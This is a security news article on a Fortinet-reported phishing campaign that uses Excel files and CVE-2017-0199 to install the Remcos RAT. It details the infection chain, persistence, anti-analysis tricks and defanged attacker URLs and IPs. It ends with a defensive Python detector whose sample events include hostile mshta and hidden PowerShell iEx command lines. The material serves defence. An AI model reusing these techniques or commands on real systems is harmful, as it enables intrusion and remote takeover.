Hackers exploit Excel documents due to their popularity and built-in vulnerabilities. With VBA macros now blocked by default, they have turned to using “.XLL” files to deliver malware.
Hackers Use Malicious Excel Files to Deliver Remcos RAT
Fortinet researchers recently found that hackers are targeting Windows users with malicious Excel files to deploy Remcos RAT. FortiGuard Labs identified one such phishing attack when they received an email containing an Excel file disguised as an order document.
When opened, the document exploits the Microsoft Office Remote Code Execution vulnerability (CVE-2017-0199) to download an HTA (HTML Application) file via a short URL, which redirects to “hxxp://192[.]3[.]220[.]22/xampp/en/cookienetbookinetcahce.hta.” The Windows application mshta.exe then executes the HTA file, using JavaScript, VBScript, Base64 encoding, URL encoding, and PowerShell scripts to conceal information under layers of obfuscation.
The HTA file downloads an executable named “dllhost.exe” into the %AppData% directory using the URLDownloadToFile() API.
When executed, dllhost.exe extracts files into %AppData%\intercessionate\Favourablies117\sulfonylurea and starts a 32-bit PowerShell process that reads and executes obfuscated code from Aerognosy.Res using Invoke-Expression (iEx). The final payload, Remcos—a commercial RAT often misused by threat actors—enables remote control and data theft from victims’ computers.
The report states that the malware gains persistence by copying dllhost.exe to %temp% as “Vaccinerende.exe,” hiding the PowerShell process, and loading malicious code from “Valvulate.Cru” directly into memory using VirtualAlloc() and CallWindowProcA() APIs, ultimately securing full remote control over the system.
The malware uses a multi-stage attack chain starting with PowerShell exploitation, implementing advanced anti-analysis techniques, such as:
- Self-decrypting code blocks wrapped in redundant instructions
- Vectored exception handlers to hinder debugging
- Dynamic API resolution via PEB access at fs:[30h]
- Anti-debugging checks, like ThreadHideFromDebugger (0x11) and ProcessDebugPort monitoring
The malware then employs process hollowing by creating a suspended instance of “Vaccinerende.exe” (derived from “dllhost.exe”) using the CREATE_SUSPENDED flag. It leverages APIs like NtAllocateVirtualMemory and NtMapViewOfSection to load malicious code. To persist, it creates a key in the Auto_Run registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
The malware retrieves and decodes an encrypted Remcos RAT variant (5.1.2 Pro) from hxxp://192[.]3[.]220[.]22/hFXELFSwRHRwqbE214.bin and runs it using the NtCreateThreadEx native API. This version of Remcos uses packed packets with a command ID, containing system files and command data for the C&C server at 107[.]173[.]4[.]16:2404. It enables remote control features like keylogging, screenshots, and process manipulation via a configuration block in “SETTINGS.”
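The chain described above (Excel spawning mshta.exe, mshta.exe dropping an executable into %AppData%, that executable launching a hidden PowerShell with Invoke-Expression, and a Run key pointing at a %temp% copy) gives a defender four independent detection points. The following is an added example, not code from the Fortinet report: a small detector run over constructed Sysmon-style process and registry events; the user name, paths and command lines in the sample events are hypothetical.

```python
import re

# Constructed sample events (not from the report). Event 1 is the Excel -> mshta hop,
# 2 the HTA dropping an .exe into %AppData%, 3 the 32-bit PowerShell IEX loader,
# 4 the Run-key write pointing at the %temp% copy, 5 benign noise.
SAMPLE_EVENTS = [
    {"type": "process", "parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/cookienetbookinetcahce.hta"},
    {"type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Users\alice\AppData\Roaming\dllhost.exe", "cmdline": "dllhost.exe"},
    {"type": "process", "parent": r"C:\Users\alice\AppData\Roaming\dllhost.exe",
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -c "iEx (Get-Content $env:APPDATA\Aerognosy.Res)"'},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Vaccinerende",
     "data": r"C:\Users\alice\AppData\Local\Temp\Vaccinerende.exe"},
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
]

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
RUN_KEY = r"\software\microsoft\windows\currentversion\run"
USER_WRITABLE = (r"\appdata\roaming", r"\appdata\local\temp")

def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def _in_user_writable(path):
    """True if the path sits under %AppData% or %temp%, where the dropper and the persisted copy live."""
    p = path.lower()
    return any(d in p for d in USER_WRITABLE)

def detect(events):
    """Return (rule_name, detail) for each event matching one stage of the chain.
    Rules are independent, so a partial chain (e.g. only the Run-key write) still alerts."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            parent, image, cmd = _base(ev["parent"]), _base(ev["image"]), ev["cmdline"].lower()
            if parent in OFFICE_APPS and image == "mshta.exe":
                hits.append(("office_spawns_mshta", ev["cmdline"]))
            if parent == "mshta.exe" and _in_user_writable(ev["image"]):
                hits.append(("mshta_starts_appdata_exe", ev["image"]))
            if image == "powershell.exe" and _in_user_writable(ev["parent"]) \
                    and re.search(r"\biex\b|invoke-expression", cmd):
                hits.append(("appdata_exe_runs_iex_powershell", ev["parent"]))
        elif ev["type"] == "registry":
            if RUN_KEY in ev["key"].lower() and _in_user_writable(ev["data"]):
                hits.append(("run_key_points_to_temp", ev["key"]))
    return hits
```

Each rule maps to a different stage, so a single alert on any of them is worth triage even when the earlier stages were not logged.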
IOCs